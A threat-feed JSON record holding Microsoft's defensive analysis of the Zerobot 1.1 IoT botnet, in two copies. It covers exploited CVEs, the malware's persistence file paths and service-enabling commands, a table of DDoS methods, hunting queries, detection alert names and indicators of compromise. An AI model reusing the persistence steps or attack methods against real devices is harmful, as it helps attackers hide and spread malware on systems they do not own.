"confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-29557", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-20090", "CVE-2021-22502", "CVE-2021-22506", "CVE-2021-31755"], "modified": "2021-08-11T03:38:35", "id": "THN:EE1B4CCBFEA2E4D18964A709469ABD37", "href": "https://thehackernews.com/2021/08/hackers-exploiting-new-auth-bypass-bug.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mmpc": [{"lastseen": "2022-12-21T20:35:18", "description": "Botnet malware operations are a constantly evolving threat to devices and networks. Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices\u2019 configurations often leave them exposed, and the number of internet-connected devices continue to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.\n\nZerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. Zerobot is offered as part of a malware as a service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services [seized by the FBI](<https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites>) in December 2022.\n\nMicrosoft has previously reported on the [evolving threat ecosystem](<https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>). The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.\n\nIn this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet\u2019s recent [analysis](<https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities>) on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware\u2019s reach to different types of devices. In addition to these findings, we\u2019re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.\n\n## What is Zerobot?\n\nZerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.\n\nThe most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## How Zerobot gains and maintains device access\n\nIoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.\n\nIn addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. Zerobot 1.1 includes several new vulnerabilities, such as:\n\n**Vulnerability**| **Affected software** \n---|--- \nCVE-2017-17105| Zivif PR115-204-P-RS \nCVE-2019-10655| Grandstream \nCVE-2020-25223| WebAdmin of Sophos SG UTM \nCVE-2021-42013| Apache \nCVE-2022-31137| Roxy-WI \nCVE-2022-33891| Apache Spark \nZSL-2022-5717| MiniDVBLinux \n \nSince the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. Microsoft researchers have also identified that previous reports have used the vulnerability ID \u201cZERO-32906\u201d for CVE-2018-20057, \u201cGPON\u201d for CVE-2018-10561, and \u201cDLINK\u201d for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.\n\nMicrosoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.\n\nUpon gaining device access, Zerobot injects a malicious payload, which may be a generic script called _zero.sh _that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.\n\nDepending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name _FireWall.exe_ (older versions use _my.exe)_. Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. See detection details below.\n\nTo achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:\n\n**Desktop entry:**\n\nZerobot copies itself to _$HOME/.config/ssh.service/sshf_ then writes a desktop entry file called _sshf.desktop_ to the same directory. Older Linux versions use _$HOME/.config/autostart_ instead of _$HOME/.config/ssh.service_.\n\n**Daemon:**\n\nCopies itself to _/usr/bin/sshf_ and writes a configuration at _/etc/init/sshf.conf_.\n\n**Service:**\n\nCopies itself to _/etc/sshf_ and writes a service configuration at _/lib/system/system/sshf.service_, then enables the service (to make sure it starts at boot) with two commands:\n\n * _systemctl enable sshf_\n * _service enable sshf_\n\nAll persistence mechanisms on older Linux versions use _my.bin_ and _my.bin.desktop_ instead of _sshf_ and _sshf.desktop._\n\n## New attack capabilities\n\nIn addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.\n\nThe following are the previously known Zerobot capabilities:\n\n**Attack method**| **Description** \n---|--- \nUDP_LEGIT| Sends UDP packets without data. \nMC_PING| Meant for DDoS on Minecraft servers. Sends a handshake and status request. \nTCP_HANDSHAKE| Floods with TCP handshakes. \nTCP_SOCKET| Continuously sends random payloads on an open TCP socket. Payload length is customizable. \nTLS_SOCKET| Continuously sends random payloads on an open TLS socket. Payload length is customizable. \nHTTP_HANDLE| Sends HTTP GET requests using a Golang standard library. \nHTTP_RAW| Formats and sends HTTP GET requests. \nHTTP_BYPASS| Sends HTTP GET requests with spoofed headers. \nHTTP_NULL| HTTP headers are each one random byte (not necessarily ascii). \n \nPreviously undisclosed and new capabilities are the following:\n\n**Attack method**| **Description** \n---|--- \nUDP_RAW| Sends UDP packets where the payload is customizable. \nICMP_FLOOD| Supposed to be an ICMP flood, but the packet is built incorrectly. \nTCP_CUSTOM| Sends TCP packets where the payload and flags are fully customizable. \nTCP_SYN| Sends SYN packets. \nTCP_ACK| Sends ACK packets. \nTCP_SYNACK| Sends SYN-ACK packets. \nTCP_XMAS| Christmas tree attack (all TCP flags are set). The reset cause field is \u201cxmas\u201d. \n \n## How Zerobot spreads\n\nAfter persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called _new_botnet_selfRepo_isHoneypot_, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.\n\nMicrosoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called _impst.sh_:\n\n![Screenshot of malware code, a script that is used to download a remote code administration tool ](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Fig-1-the-impstsh-script-used-to-download-the-remote-administration-tool-1.png)Figure 1. The _impst.sh_ script used to download the remote administration tool\n\n## Defending devices and networks against Zerobot\n\nThe continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:\n\n * Use security solutions with cross-domain visibility and detection capabilities like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and Microsoft Defender for Endpoint detect Zerobot malware variants and malicious behavior related to this threat.\n * Adopt a comprehensive IoT security solution such as [Microsoft Defender for IoT](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-iot>) to allow visibility and monitoring of all IoT and OT devices, threat detection and response, and integration with SIEM/SOAR and XDR platforms such as Microsoft Sentinel and Microsoft 365 Defender.\n * Ensure secure configurations for devices: Change the default password to a strong one, and block SSH from external access.\n * Maintain device health with updates: Make sure devices are up to date with the latest firmware and patches.\n * Use least privileges access: Use a secure virtual private network (VPN) service for remote access and restrict remote access to the device.\n * Harden endpoints with a comprehensive Windows security solution:\n * Manage the apps your employees can use through Windows Defender Application Control and for unmanaged solutions, enabling Smart App Control.\n * Perform timely cleanup of all unused and stale executables sitting on yours or your organizations\u2019 devices.\n\n## Detections\n\n**Microsoft Defender for IoT**\n\nMicrosoft Defender for IoT uses detection rules and signatures to identify malicious behavior. Microsoft Defender for IoT has alerts for the following vulnerabilities and exploits which may be tied to Zerobot activity:\n\n * CVE-2014-8361\n * CVE-2016-20017\n * CVE-2017-17105\n * CVE-2017-17215\n * CVE-2018-10561\n * CVE-2018-20057\n * CVE-2019-10655\n * CVE-2020-7209\n * CVE-2020-10987\n * CVE-2020-25506\n * CVE-2021-35395\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2021-46422\n * CVE-2022-22965\n * CVE-2022-25075\n * CVE-2022-26186\n * CVE-2022-26210\n * CVE-2022-30023\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-33891\n * CVE-2022-34538\n * CVE-2022-37061\n * ZERO-36290\n * ZSL-2022-5717\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects the malicious files under the following platforms and threat names:\n\n * Zerobot (Win32/64 and Linux)\n * SparkRat (Win32/64 and Linux)\n\n**Microsoft Defender for Endpoint**\n\nMicrosoft Defender for Endpoint alerts with the following titles can indicate threat activity on your network:\n\n * DEV-1061 threat activity group detected\n * An active 'PrivateLoader' malware process was detected while executing\n * 'Morila' malware was prevented\n * 'Multiverze' malware was detected\n\nMicrosoft Defender for Endpoint also has detections for the following vulnerabilities exploited by Zerobot:\n\n * CVE-2022-22965 (Spring4Shell)\n\nMicrosoft Defender for Endpoint's Device Discovery capabilities discover and classify devices. With these capabilities, Microsoft 365 Defender customers using Microsoft Defender for IoT have visibility into security recommendations for devices with the following vulnerabilities:\n\n * CVE-2014-8361\n * CVE-2019-10655\n * CVE-2020-25506\n * CVE-2021-36260\n * CVE-2021-42013\n * CVE-2022-30525\n * CVE-2022-31137\n * CVE-2022-37061\n\nDevices with these vulnerabilities are also visible in the Microsoft Defender Vulnerability Management inventory.\n\n**Microsoft Defender for Cloud**\n\nMicrosoft Defender for Cloud alerts with the following titles can indicate threat activity on your network:\n\n * VM_ReverseShell\n * VM_SuspectDownloadArtifacts\n * SQL.VM_ShellExternalSourceAnomaly\n * AppServices_CurlToDisk\n\n## Advanced hunting queries\n\n### **Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks.\n\n**Zerobot files**\n\nThis query finds the file hashes associated with Zerobot activity.\n \n \n let IoCList = externaldata(TimeGenerated:datetime,IoC:string,IoC_Type:string,ExpirationDateTime:datetime,Description:string, Action:string, ConfidenceScore:real, ThreatType:string, Active:string,Type:string, TrafficLightProtocolLevel:string, \n ActivityGroupNames:string)[@\"https://raw.githubusercontent.com/microsoft/mstic/master/RapidReleaseTI/Indicators.csv\"] \n with(format=\"csv\", ignoreFirstRecord=True);\n let shahashes = IoCList\n | where IoC_Type =~ \"sha256\" and Description =~ \"Dev-1061 Zerobot affecting IoT devices\"\n | distinct IoC;\n DeviceFileEvents\n | where SHA256 in (shahashes)\n\n**Zerobot HTTP requests**\n\nThis query finds suspicious HTTP requests originated by the IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"NetworkSignatureInspected\"\n | where Timestamp > ago(30d)\n |extend json = parse_json(AdditionalFields)\n | extend SignatureName =tostring(json.SignatureName), SignatureMatchedContent = tostring(json.SignatureMatchedContent), SignatureSampleContent = tostring(json.SamplePacketContent)\n |where SignatureName == \"HTTP_Client\"\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, SignatureName, SignatureMatchedContent, SignatureSampleContent\n \n\n**Zerobot port knocking**\n\nThis query finds incoming connections from IOCs associated with Zerobot activity.\n \n \n DeviceNetworkEvents\n | where RemoteIP in(\"176.65.137.5\",\"176.65.137.6\")\n | where ActionType == \"InboundConnectionAccepted\"\n | where Timestamp > ago(30d)\n |project Timestamp, DeviceId, DeviceName, RemoteIP, RemotePort, LocalIP, LocalPort, InitiatingProcessFileName\n \n\n### **Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\n## Indicators of compromise (IOCs):\n\n**Domains and IP addresses:**\n\n * zero[.]sudolite[.]ml\n * 176.65.137[.]5\n * 176.65.137[.]5:1401\n * 176.65.137[.]6\n * ws[:]//176.65.137[.]5/handle\n * http[:]//176.65.137[.]5:8000/ws\n\n**New Zerobot hashes (SHA-256)**\n\n * aed95a8f5822e9b1cd1239abbad29d3c202567afafcf00f85a65df4a365bedbb\n * bf582b5d470106521a8e7167a5732f7e3a4330d604de969eb8461cbbbbdd9b9a\n * 0a5eebf19ccfe92a2216c492d6929f9cac72ef37089390572d4e21d0932972c8\n * 1e7ca210ff7bedeefadb15a9ec5ea68ad9022d0c6f41c4e548ec2e5927026ba4\n * 05b7517cb05fe1124dd0fad4e85ddf0fe65766a4c6c9986806ae98a427544e9d\n * 5625d41f239e2827eb05bfafde267109549894f0523452f7a306b53b90e847f2\n * c304a9156a032fd451bff49d75b0e9334895604549ab6efaab046c5c6461c8b3\n * 66c76cfc64b7a5a06b6a26976c88e24e0518be3554b5ae9e3475c763b8121792\n * 539640a482aaee2fe743502dc59043f11aa8728ce0586c800193e30806b2d0e5\n * 0f0ba8cc3e46fff0eef68ab5f8d3010241e2eea7ee795e161f05d32a0bf13553\n * 343c9ca3787bf763a70ed892dfa139ba69141b61c561c128084b22c16829c5af\n * 874b0691378091a30d1b06f2e9756fc7326d289b03406023640c978ff7c87712\n * 29eface0054da4cd91c72a0b2d3cda61a02831b4c273e946d7e106254a6225a7\n * 4a4cb8516629c781d5557177d48172f4a7443ca1f826ea2e1aa6132e738e6db2\n * bdfd89bdf6bc2de5655c3fe5f6f4435ec4ad37262e3cc72d8cb5204e1273ccd6\n * 62f23fea8052085d153ac7b26dcf0a15fad0c27621f543cf910e37f8bf822e0e\n * 788e15fd87c45d38629e3e715b0cb93e55944f7c4d59da2e480ffadb6b981571\n * 26e68684f5b76d9016d4f02b8255ff52d1b344416ffc19a2f5c793ff1c2fdc65\n * e4840c5ac2c2c2170d00feadb5489c91c2943b2aa13bbec00dbcffc4ba8dcc2d\n * 45059f26e32da95f4bb5dababae969e7fceb462cdeadf7d141c39514636b905a\n * 77dd28a11e3e4260b9a9b60d58cb6aaaf2147da28015508afbaeda84c1acfe70\n * cf232e7d39094c9ba04b9713f48b443e9d136179add674d62f16371bf40cf8c8\n * 13657b64a2ac62f9d68aeb75737cca8f2ab9f21e4c38ce04542b177cb3a85521\n * eb33c98add35f6717a3afb0ab2f9c0ee30c6f4e0576046be9bf4fbf9c5369f71\n * e3dd20829a34caab7f1285b730e2bb0c84c90ac1027bd8e9090da2561a61ab17\n * 3685d000f6a884ca06f66a3e47340e18ff36c16b1badb80143f99f10b8a33768\n * cdc28e7682f9951cbe2e55dad8bc2015c1591f89310d8548c0b7a1c65dbefae3\n * 869f4fb3f185b2d1231d9378273271ddfeebb53085daede89989f9cc8d364f5f\n * 6c59af3ed1a616c238ee727f6ed59e962db70bc5a418b20b24909867eb00a9d6\n * ef28ee3301e97eefd2568a3cb4b0f737c5f31983710c75b70d960757f2def74e\n * 95e4cc13f8388c195a1220cd44d26fcb2e10b7b8bfc3d69efbc51beb46176ff1\n * 62f9eae8a87f64424df90c87dd34401fe7724c87a394d1ba842576835ab48afc\n * 54d1daf58ecd4d8314b791a79eda2258a69d7c69a5642b7f5e15f2210958bdce\n * 8176991f355db10b32b7562d1d4f7758a23c7e49ed83984b86930b94ccc46ab3\n * 8aa89a428391683163f0074a8477d554d6c54cab1725909c52c41db2942ac60f\n * fd65bd8ce671a352177742616b5facc77194cccec7555a2f90ff61bad4a7a0f6\n * 1e66ee40129deccdb6838c2f662ce33147ad36b1e942ea748504be14bb1ee0ef\n * 57f83ca864a2010d8d5376c68dc103405330971ade26ac920d6c6a12ea728d3d\n * 7bfd0054aeb8332de290c01f38b4b3c6f0826cf63eef99ddcd1a593f789929d6\n\n****SparkRat** hashes (SHA-256): **\n\n * 0ce7bc2b72286f236c570b1eb1c1eacf01c383c23ad76fd8ca51b8bc123be340\n * cacb77006b0188d042ce95e0b4d46f88828694f3bf4396e61ae7c24c2381c9bf\n * 65232e30bb8459961a6ab2e9af499795941c3d06fdd451bdb83206a00b1b2b88\n\n_**Rotem Sde-Or**, **Ilana Sivan**, **Gil Regev**, Microsoft Defender for IoT Research Team \n**Meitar Pinto**, **Nimrod Roimy**, **Nir Avnery**, Microsoft Defender Research Team \n**Ramin Nafisi**, **Ross Bevington**, Microsoft Threat Intelligence Center (MSTIC)_\n\nThe post [Microsoft research uncovers new Zerobot capabilities](<https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/en-us/security/blog>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-12-21T20:00:00", "type": "mmpc", "title": "Microsoft research uncovers new Zerobot capabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-8361", "CVE-2016-20017", "CVE-2017-17105", "CVE-2017-17106", "CVE-2017-17215", "CVE-2018-10561", "CVE-2018-12613", "CVE-2018-20057", "CVE-2019-10655", "CVE-2020-10987", "CVE-2020-25223", "CVE-2020-25506", "CVE-2020-7209", "CVE-2021-35395", "CVE-2021-36260", "CVE-2021-42013", "CVE-2021-46422", "CVE-2022-22965", "CVE-2022-25075", "CVE-2022-26186", "CVE-2022-26210", "CVE-2022-30023", "CVE-2022-30525", "CVE-2022-31137", "CVE-2022-33891", "CVE-2022-34538", "CVE-2022-37061", "CVE-2022-42013"], "modified": "2022-12-21T20:00:00", "id": "MMPC:0FBB61490D4A94C83AEE14DDEE722297", "href": "https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "mssecure": [{"lastseen": "2022-12-21T20:16:24", "description": "Botnet malware operations are a constantly evolving threat to devices and networks. Threat actors target Internet of Things (IoT) devices for recruitment into malicious operations as IoT devices\u2019 configurations often leave them exposed, and the number of internet-connected devices continue to grow. Recent trends have shown that operators are redeploying malware for a variety of distributions and objectives, modifying existing botnets to scale operations and add as many devices as possible to their infrastructure.\n\nZerobot, a Go-based botnet that spreads primarily through IoT and web application vulnerabilities, is an example of an evolving threat, with operators continuously adding new exploits and capabilities to the malware. The Microsoft Defender for IoT research team has been monitoring Zerobot (also called ZeroStresser by its operators) for months. Zerobot is offered as part of a malware as a service scheme and has been updated several times since Microsoft started to track it. One domain with links to Zerobot was among several domains associated with DDoS-for-hire services [seized by the FBI](<https://www.justice.gov/usao-cdca/pr/federal-prosecutors-los-angeles-and-alaska-charge-6-defendants-operating-websites>) in December 2022.\n\nMicrosoft has previously reported on the [evolving threat ecosystem](<https://www.microsoft.com/en-us/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/>). The shift toward malware as a service in the cyber economy has industrialized attacks and has made it easier for attackers to purchase and use malware, establish and maintain access to compromised networks, and utilize ready-made tools to perform their attacks. We have tracked advertisements for the Zerobot botnet on various social media networks in addition to other announcements regarding the sale and maintenance of the malware, as well as new capabilities in development.\n\nIn this blog post, we present information about the latest version of the malware, Zerobot 1.1, including newly identified capabilities and further context to Fortinet\u2019s recent [analysis](<https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities>) on the threat. Zerobot 1.1 increases its capabilities with the inclusion of new attack methods and new exploits for supported architectures, expanding the malware\u2019s reach to different types of devices. In addition to these findings, we\u2019re sharing new indicators of compromise (IOCs) and recommendations to help defenders protect devices and networks against this threat.\n\n## What is Zerobot?\n\nZerobot affects a variety of devices that include firewall devices, routers, and cameras, adding compromised devices to a distributed denial of service (DDoS) botnet. Using several modules, the malware can infect vulnerable devices built on diverse architectures and operating systems, find additional devices to infect, achieve persistence, and attack a range of protocols. Microsoft tracks this activity as DEV-1061.\n\nThe most recent distribution of Zerobot includes additional capabilities, such as exploiting vulnerabilities in Apache and Apache Spark (CVE-2021-42013 and CVE-2022-33891 respectively), and new DDoS attack capabilities.\n\nMicrosoft uses DEV-#### designations as a temporary name given to an unknown, emerging, or developing cluster of threat activity, allowing Microsoft to track it as a unique set of information until we can reach high confidence about the origin or identity of the actor behind the activity. Once it meets defined criteria, a DEV group is converted to a named actor.\n\n## How Zerobot gains and maintains device access\n\nIoT devices are often internet-exposed, leaving unpatched and improperly secured devices vulnerable to exploitation by threat actors. Zerobot is capable of propagating through brute force attacks on vulnerable devices with insecure configurations that use default or weak credentials. The malware may attempt to gain device access by using a combination of eight common usernames and 130 passwords for IoT devices over SSH and telnet on ports 23 and 2323 to spread to devices. Microsoft researchers identified numerous SSH and telnet connection attempts on default ports 22 and 23, as well as attempts to open ports and connect to them by port-knocking on ports 80, 8080, 8888, and 2323.\n\nIn addition to brute force attempts on devices, Zerobot exploits dozens of vulnerabilities, which malware operators add on a rolling basis to gain access and inject malicious payloads. Zerobot 1.1 includes several new vulnerabilities, such as:\n\n**Vulnerability**| **Affected software** \n---|--- \nCVE-2017-17105| Zivif PR115-204-P-RS \nCVE-2019-10655| Grandstream \nCVE-2020-25223| WebAdmin of Sophos SG UTM \nCVE-2021-42013| Apache \nCVE-2022-31137| Roxy-WI \nCVE-2022-33891| Apache Spark \nZSL-2022-5717| MiniDVBLinux \n \nSince the release of Zerobot 1.1, the malware operators have removed CVE-2018-12613, a phpMyAdmin vulnerability that could allow threat actors to view or execute files. Microsoft researchers have also identified that previous reports have used the vulnerability ID \u201cZERO-32906\u201d for CVE-2018-20057, \u201cGPON\u201d for CVE-2018-10561, and \u201cDLINK\u201d for CVE-2016-20017; and that CVE-2020-7209 was mislabeled as CVE-2017-17106 and CVE-2022-42013 was mislabeled as CVE-2021-42013.\n\nMicrosoft researchers have also found new evidence that Zerobot propagates by compromising devices with known vulnerabilities that are not included in the malware binary, such as CVE-2022-30023, a command injection vulnerability in Tenda GPON AC1200 routers.\n\nUpon gaining device access, Zerobot injects a malicious payload, which may be a generic script called _zero.sh _that downloads and attempts to execute Zerobot, or a script that downloads the Zerobot binary of a specific architecture. The bash script that attempts to download different Zerobot binaries tries to identify the architecture by brute-force, attempting to download and execute binaries of various architectures until it succeeds, as IoT devices are based on many computer processing units (CPUs). Microsoft has observed scripts targeting various architectures including ARM64, MIPS, and x86_64.\n\nDepending on the operating system of the device, the malware has different persistence mechanisms. Persistence tactics are used by malware operators to obtain and maintain access to devices. While Zerobot is unable to spread to Windows machines, we have found several samples that can run on Windows. On Windows machines, the malware copies itself to the Startup folder with the file name _FireWall.exe_ (older versions use _my.exe)_. Microsoft Defender for Endpoint detects this malware and related malicious activity on both Windows and Linux devices. See detection details below.\n\nTo achieve persistence on Linux-based devices, Zerobot uses a combination of desktop entry, daemon, and service methods:\n\n**Desktop entry:**\n\nZerobot copies itself to _$HOME/.config/ssh.service/sshf_ then writes a desktop entry file called _sshf.desktop_ to the same directory. Older Linux versions use _$HOME/.config/autostart_ instead of _$HOME/.config/ssh.service_.\n\n**Daemon:**\n\nCopies itself to _/usr/bin/sshf_ and writes a configuration at _/etc/init/sshf.conf_.\n\n**Service:**\n\nCopies itself to _/etc/sshf_ and writes a service configuration at _/lib/system/system/sshf.service_, then enables the service (to make sure it starts at boot) with two commands:\n\n * _systemctl enable sshf_\n * _service enable sshf_\n\nAll persistence mechanisms on older Linux versions use _my.bin_ and _my.bin.desktop_ instead of _sshf_ and _sshf.desktop._\n\n## New attack capabilities\n\nIn addition to the functions and attacks included in previous versions of the malware, Zerobot 1.1 has additional DDoS attack capabilities. These functions allow threat actors to target resources and make them inaccessible. Successful DDoS attacks may be used by threat actors to extort ransom payments, distract from other malicious activities, or disrupt operations. In almost every attack, the destination port is customizable, and threat actors who purchase the malware can modify the attack according to their target.\n\nThe following are the previously known Zerobot capabilities:\n\n**Attack method**| **Description** \n---|--- \nUDP_LEGIT| Sends UDP packets without data. \nMC_PING| Meant for DDoS on Minecraft servers. Sends a handshake and status request. \nTCP_HANDSHAKE| Floods with TCP handshakes. \nTCP_SOCKET| Continuously sends random payloads on an open TCP socket. Payload length is customizable. \nTLS_SOCKET| Continuously sends random payloads on an open TLS socket. Payload length is customizable. \nHTTP_HANDLE| Sends HTTP GET requests using a Golang standard library. \nHTTP_RAW| Formats and sends HTTP GET requests. \nHTTP_BYPASS| Sends HTTP GET requests with spoofed headers. \nHTTP_NULL| HTTP headers are each one random byte (not necessarily ascii). \n \nPreviously undisclosed and new capabilities are the following:\n\n**Attack method**| **Description** \n---|--- \nUDP_RAW| Sends UDP packets where the payload is customizable. \nICMP_FLOOD| Supposed to be an ICMP flood, but the packet is built incorrectly. \nTCP_CUSTOM| Sends TCP packets where the payload and flags are fully customizable. \nTCP_SYN| Sends SYN packets. \nTCP_ACK| Sends ACK packets. \nTCP_SYNACK| Sends SYN-ACK packets. \nTCP_XMAS| Christmas tree attack (all TCP flags are set). The reset cause field is \u201cxmas\u201d. \n \n## How Zerobot spreads\n\nAfter persistence is achieved, Zerobot scans for other internet-exposed devices to infect. The malware randomly generates a number between 0 and 255 and scans all IPs starting with this value. Using a function called _new_botnet_selfRepo_isHoneypot_, the malware tries to identify honeypot IP addresses, which are used by network decoys to attract cyberattacks and collect information on threats and attempts to access resources. This function includes 61 IP subnets, preventing scanning of these IPs.\n\nMicrosoft researchers also identified a sample that can run on Windows based on a cross-platform (Linux, Windows, macOS) open-source remote administration tool (RAT) with various features such as managing processes, file operations, screenshotting, and running commands. This tool was found by investigating the command-and-control (C2) IPs used by the malware. The script, which is used to download this RAT, is called _impst.sh_:\n\n![Screenshot of malware code, a script that is used to download a remote code administration tool ](https://www.microsoft.com/en-us/security/blog/wp-content/uploads/2022/12/Fig-1-the-impstsh-script-used-to-download-the-remote-administration-tool-1.png)Figure 1. The _impst.sh_ script used to download the remote administration tool\n\n## Defending devices and networks against Zerobot\n\nThe continuous evolution and rapid addition of new capabilities in the latest Zerobot version underscores the urgency of implementing comprehensive security measures. Microsoft recommends the following steps to protect devices and networks against the threat of Zerobot:\n\n * Use security solutions with cross-domain visibility and detection capabilities like [Microsoft 365 Defender](<https://www.microsoft.com/security/business/threat-protection/microsoft-365-defender>), which provides integrated defense across endpoints, identities, email, applications, and data. Microsoft Defender Antivirus and 